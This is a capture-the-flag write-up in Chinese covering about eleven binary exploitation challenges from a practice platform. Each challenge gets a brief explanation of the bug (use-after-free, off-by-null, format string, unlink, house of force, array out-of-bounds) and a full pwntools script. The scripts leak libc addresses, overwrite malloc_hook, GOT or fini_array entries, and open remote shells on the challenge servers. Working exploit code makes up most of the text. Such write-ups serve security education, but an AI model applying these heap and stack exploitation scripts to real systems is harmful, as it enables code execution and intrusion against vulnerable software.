BUUCTF-pwn(15)
gyctf_2020_some_thing_interesting
经典UAF漏洞!
Allocate申请函数!
Free释放函数!
全保护开启,故我们利用格式化字符串漏洞泄露libc地址,从而得到malloc_hook地址。然后利用UAF漏洞修改malloc_hook为one_gadget,此时进行申请操作便可获取权限!
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './gyctf_2020_some_thing_interesting'
r = remote('node4.buuoj.cn',28040)
#r = process(binary)
elf = ELF(binary)
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
libc = ELF('./libc-2.23.so')
def start():
r.sendlineafter("code please:",'OreOOrereOOreO%17$p')
def Allocate(size=0x18,size2=0x18,payload='\n',payload2='\n'):
r.sendlineafter("to do :",'1')
r.sendlineafter("O's length : ",str(size))
r.sendafter("> O : ",payload)
r.sendlineafter("RE's length : ",str(size2))
r.sendafter("> RE : ",payload2)
def Edit(index,payload,payload2):
r.sendlineafter("to do :",'2')
r.sendlineafter("> Oreo ID : ",str(index))
r.sendafter("> O : ",payload)
r.sendafter("> RE : ",payload2)
def Free(index):
r.sendlineafter("to do :",'3')
r.sendlineafter("> Oreo ID : ",str(index))
def Show(index):
r.sendlineafter("to do :",'4')
r.sendlineafter("> Oreo ID : ",str(index))
def Check():
r.sendlineafter("to do :",'0')
one = [0x45206,0x4525a,0xef9f4,0xf0897,0x45216,0x4526a,0xf02a4,0xf1147]
start()
#gdb.attach(r)
Check()
r.recvuntil("0x")
libc_base = int(r.recv(12),16)-240-libc.symbols['__libc_start_main']
malloc_hook = libc_base+libc.symbols['__malloc_hook']
success(hex(libc_base))
Allocate(0x68,0x68,'aaaa','bbbb')
Free(1)
Edit(1,p64(0),p64(malloc_hook-0x23))
Allocate(0x68,0x68,'cccc',b'd'*0x13+p64(libc_base+one[7]))
#gdb.attach(r)
r.sendlineafter("to do :",'1')
r.sendlineafter("O's length : ",str(0x18))
r.interactive()
wdb_2018_3rd_soEasy
简单的ret2shellcode!
采用栈迁移返回到shellcode地址,也可以直接修改ret的栈地址(此时不需栈迁移,较简单)
from pwn import *
context(log_level='debug',os='linux',arch='i386')
binary = './wdb_2018_3rd_soEasy'
r = remote('node4.buuoj.cn',29036)
#r = process(binary)
elf = ELF(binary)
leave_ret = 0x08048478
shellcode = asm(shellcraft.sh())
#gdb.attach(r,'b *0x0804850B')
r.recvuntil('gift->0x')
shell_addr = int(r.recv(8),16)
payload = p32(shell_addr+0x4)+shellcode.ljust(0x44,b'c')+p32(shell_addr-0x4)+p32(leave_ret)
#gdb.attach(r)
#pause()
r.send(payload)
success(hex(shell_addr))
r.interactive()
suctf_2018_stack
简单的栈溢出漏洞,但只能溢出0x8字节,为amd64位,存在后门函数,但是直接直接使用栈不平衡,~~故采用栈迁移手段构造栈平衡的system,但无法泄露栈地址,故无法使用栈迁移。~~故使后门函数提前1位,从而不存在什么函数中的push指令,栈平衡!
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './SUCTF_2018_stack'
r = remote('node4.buuoj.cn',26086)
#r = process(binary)
elf = ELF(binary)
system = elf.symbols['system']
pop_rdi_ret = 0x004007a3
leave_ret = 0x00400732
shell_addr = 0x0400677#0x00400676
sh = 0x004007C8
#gdb.attach(r)
r.recv()
'''payload = b'aaaaaaaa'+p64(pop_rdi_ret)+p64(sh)+p64(system)
payload = payload.ljust(0x28,b'b')+p64(leave_ret)'''
payload = b'a'*0x28+p64(shell_addr)
r.send(payload)
r.interactive()
hitcon_2018_children_tcache
分析主要函数!
主体存在三个函数!
Allocate申请函数,主要需要注意strcpy以\x00为结尾符。如输入0x10字符,则自动将0x11赋值为\x00。
Free释放函数!
可以发现存在menset函数,该函数对程序来说存在较大保护,很多攻击手法无法使用了!但是存在off by null
故我们需要想办法造成堆块重叠!
Allocate(0x410)#0
Allocate(0x88)#1
Allocate(0x4f0)#2
Allocate()#3
构造大致布局
for i in range(2):
Free(i)#0 1
Allocate(0x88,b’a’0x88)#0
for i in range(1,6):
Free(0)
Allocate(0x88-i,b’a’(0x88-i))#0
Free(0)#0
Allocate(0x82,b’b’*0x80+p64(0x4b0))#0 flag_chunk
Free(2)#2
Allocate(0x410)#1
Show(0)
此时通过off by null来造成修改inuse标记位从而达成堆块重叠的效果,此时便可以进行泄露
Allocate(0x80)#2
Free(0)
Free(2)
Allocate(0x88,p64(malloc_hook))
Allocate(0x88,p64(malloc_hook))
Allocate(0x88,p64(libc_base+one[4]))
此时利用堆块重叠进行tcache的double free操作,修改malloc_hook为one_gadget!
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './HITCON_2018_children_tcache'
r = remote('node4.buuoj.cn',29289)
#r = process(binary)
elf = ELF(binary)
#$libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
libc = ELF('./libc-2.27.so')
def Allocate(size=0x18,payload='\n'):
r.sendlineafter("Your choice: ",'1')
r.sendlineafter("Size:",str(size))
r.sendafter("Data:",payload)
def Show(index):
r.sendlineafter("Your choice: ",'2')
r.sendlineafter("Index:",str(index))
def Free(index):
r.sendlineafter("Your choice: ",'3')
r.sendlineafter("Index:",str(index))
one = [0x4f2c5,0x4f322,0x10a38c,0x4f2c5,0x4f322,0x10a38c]
Allocate(0x410)#0
Allocate(0x88)#1
Allocate(0x4f0)#2
Allocate()#3
for i in range(2):
Free(i)#0 1
Allocate(0x88,b'a'*0x88)#0
for i in range(1,6):
Free(0)
Allocate(0x88-i,b'a'*(0x88-i))#0
Free(0)#0
Allocate(0x82,b'b'*0x80+p64(0x4b0))#0 flag_chunk
Free(2)#2
Allocate(0x410)#1
Show(0)
main_arena = u64(r.recvuntil('\x7f').ljust(8,b'\x00'))-96# leak libc
malloc_hook = main_arena-0x10
libc_base = malloc_hook-libc.symbols['__malloc_hook']
Allocate(0x80)#2
Free(0)
Free(2)
Allocate(0x88,p64(malloc_hook))
Allocate(0x88,p64(malloc_hook))
Allocate(0x88,p64(libc_base+one[4]))
success(hex(malloc_hook))
success(hex(main_arena))
#gdb.attach(r)
r.sendlineafter("Your choice: ",'1')
r.sendlineafter("Size:",str(0x18))
r.interactive()
ciscn_2019_sw_1
本题考察格式化字符串漏洞,如果使用fmtstr_payload则输入长度有限,故无法使用,需手动计算。
此时覆写fini_array[0]为main函数地址,可以循环main函数两次,如果进而修改fini_array[1]为fini函数地址,则可以达成无限循环(除非栈帧使用完),但是依旧输入长度有限,所以我们就通过手动计算修改printf_got为system@plt地址.
from pwn import *
context(os='linux',arch='i386',log_level='debug')
binary = './ciscn_2019_sw_1'
r = remote('node4.buuoj.cn',25211)
#r = process(binary)
elf = ELF(binary)
printf_got = elf.got['printf']
system_plt = elf.plt['system']
main = elf.symbols['main']
shell_addr = 0x0804851B
fini_addr = 0x0804979C
sh = 0x08048640
def fmt(payload):
r.recvuntil("name?\n")
#sleep(0.5)
r.sendline(payload)
#gdb.attach(r)
#payload = fmtstr_payload(4,{fini_addr:main,printf_got:system_plt})# rip 23
payload = p32(fini_addr + 2) + p32(printf_got+2) + p32(printf_got) + p32(fini_addr)
payload += bytes("%"+str(0x0804-0x10)+"c%4$hn",encoding='utf-8')
payload += bytes("%5$hn",encoding='utf-8')
payload += bytes("%"+str(0x83D0-0x0804)+"c%6$hn",encoding='utf-8')
payload += bytes("%"+str(0x8534-0x83D0)+"c%7$hn",encoding='utf-8')
fmt(payload)
#gdb.attach(r)
fmt('/bin/sh\x00')
r.interactive()
lctf2016_pwn200
分析主要函数!
此时可以泄露出rbp地址,并写入shellcode!
此时可以通过溢出修改chunk内容为free_got,并经过拷贝进shellcode_addr地址,从而Free函数便可以获取权限!
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './pwn200'
r = remote('node4.buuoj.cn',29718)
#r = process(binary)
elf = ELF(binary)
free_got = elf.got['free']
shellcode = asm(shellcraft.sh())
def start():
global rbp
r.sendafter("who are u?",shellcode+b'a'*(48-len(shellcode)))
#gdb.attach(r)
rbp = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
shellcode_addr = rbp-0x50
r.sendlineafter("give me your id ~~?\n",'1')
r.sendlineafter("give me money~\n",p64(shellcode_addr)+b'\x00'*0x30+p64(free_got))
def Allocate(size=0x18,payload='\n'):
r.sendlineafter("your choice : ",'1')
r.sendlineafter("how long?",str(size))
r.send(payload)
def Free():
r.sendlineafter("your choice : ",'2')
start()
success("rbp -> "+hex(rbp))
#gdb.attach(r)
Free()
r.interactive()
[BSidesCF 2019]Runit
from pwn import *
context(log_level='debug',os='linux',arch='i386')
binary = './runit'
r = remote('node4.buuoj.cn',25216)
#r = process(binary)
elf = ELF(binary)
shellcode = asm(shellcraft.sh())
r.recvuntil("Send me stuff!!\n")
r.send(shellcode)
r.interactive()
zctf_2016_note3
正常堆题目!
Allocate申请函数!
Free释放函数!
本题正常的Unlink,附加整数漏洞,故需要注意整数漏洞
from pwn import *
from LibcSearcher import LibcSearcher
context(log_level='debug',os='linux',arch='amd64')
binary = './zctf_2016_note3'
r = remote('node4.buuoj.cn',27656)
#r = process(binary)
elf = ELF(binary)
free_got = elf.got['free']
puts_plt = elf.plt['puts']
atoi_got = elf.got['atoi']
bss_note = 0x06020C0
def Allocate(size=0x18,payload='/bin/sh\x00'):
r.sendlineafter("option--->>",'1')
r.sendlineafter("(less than 1024)\n",str(size))
r.sendlineafter("content:\n",payload)
def Edit(index,payload):
r.sendlineafter("option--->>",'3')
r.sendlineafter("the note:\n",str(index))
r.sendafter("content:\n",payload)
def Free(index):
r.sendlineafter("option--->>",'4')
r.sendlineafter("the note:\n",str(index))
Allocate(0x100)#0
Allocate(0x100)#1
Allocate()#2
Allocate()#3
Free(0)
Allocate(0x108,'a'*0x100)
target = bss_note+0x8
fd = target-0x18
bk = target-0x10
payload = p64(0)+p64(0x101)+p64(fd)+p64(bk)+b'b'*0xe0+p64(0x100)+p64(0x110)
Edit(0x8000000000000000-0x10000000000000000,payload+b'\n')
Free(1)#Unlink
Edit(0,p64(0)*3+p64(free_got)+p64(atoi_got)+b'\n')
Edit(0,p64(puts_plt)[:7]+b'\n')
Free(1)
atoi_addr = u64(r.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
libc = LibcSearcher('atoi',atoi_addr)
libc_base = atoi_addr-libc.dump('atoi')
system = libc_base+libc.dump('system')
Edit(0,p64(system)[:7]+b'\n')
success("bss_note -> "+hex(bss_note))
success("libc_base -> "+hex(libc_base))
#gdb.attach(r)
Free(3)
r.interactive()
qctf2018_stack2
数组越界漏洞,修改eip数值为后门函数地址即可!
from pwn import *
context(log_level='debug',os='linux',arch='i386')
binary = './stack2'
r = remote('node4.buuoj.cn',27560)
#r = process(binary)
elf = ELF(binary)
backdoor = 0x0804859B
def start():
r.sendlineafter("have:\n",'1')
r.sendlineafter("numbers\n",'12')
def Show():
r.sendlineafter("5. exit\n",'1')
def Add(num):
r.sendlineafter("5. exit\n",'2')
r.sendlineafter("Give me your number\n",str(num))
def Change(index,num):
r.sendlineafter("5. exit\n",'3')
r.sendlineafter("to change:\n",str(index))
r.sendlineafter("number:\n",str(num))
def Exit():
r.sendlineafter("5. exit\n",'5')
start()
one = [0x08,0x04,0x85,0x9b]
offset = 0x84
for i in range(4):
Change(offset+i,one[3-i])
#gdb.attach(r,'b *0x080486FD')
Exit()
r.interactive()
bcloud_bctf_2016(house of force)
漏洞点位于InitRead函数中!
此时就完成了house of force的前置条件。
Allocate申请函数!
Free释放函数!
此时我们可以输入bss_note与heap_addr的差值(负数),即malloc(负数)。此时进入malloc源码中,发现该负数会转换为数值极大的正数,该正数满足几个条件:1.正数<0xffffffff,2.正数>(0xffffffff-heap_addr)
此时将会申请到bss_note-0x8地址初,此时便获得了任意地址写,修改got表可获得任意地址读,此时便可以获取权限!
from pwn import *
from LibcSearcher import LibcSearcher
context(log_level='debug',os='linux',arch='i386')
binary = './bcloud_bctf_2016'
r = remote('node4.buuoj.cn',28673)
#r = process(binary)
elf = ELF(binary)
free_got = elf.got['free']
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
bss_note = 0x0804B120
def start():
global heap_addr
r.sendafter("name:\n",b'a'*0x3c+b'b'*0x4)
r.recvuntil(b"bbbb")
heap_addr = u32(r.recv(4))
r.sendafter("Org:\n",b'c'*0x40)
r.sendlineafter("Host:\n",p32(0xffffffff))
def Allocate(size=0x18,payload='\n'):
r.sendlineafter("option--->>\n",'1')
r.sendlineafter("length of the note content:\n",str(size))
r.sendafter("content:\n",payload)
def Edit(index,payload):
r.sendlineafter("option--->>\n",'3')
r.sendlineafter("Input the id:\n",str(index))
r.sendlineafter("content:\n",payload)
def Free(index):
r.sendlineafter("option--->>\n",'4')
r.sendlineafter("Input the id:\n",str(index))
start()
offset = bss_note-0x10-heap_addr-0xd0
Allocate(offset)
Allocate(0x18,p32(0)+p32(free_got)+p32(puts_got)+p32(bss_note+0x10)+b'/bin/sh\x00\n')
Edit(1,p32(puts_plt))
Free(2)
puts_addr = u32(r.recvuntil('\xf7')[-4:])
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr-libc.dump('puts')
system = libc_base+libc.dump('system')
Edit(1,p32(system))
success("heap_addr -> "+hex(heap_addr))
success("puts_addr -> "+hex(puts_addr))
#gdb.attach(r)
Free(3)
r.interactive()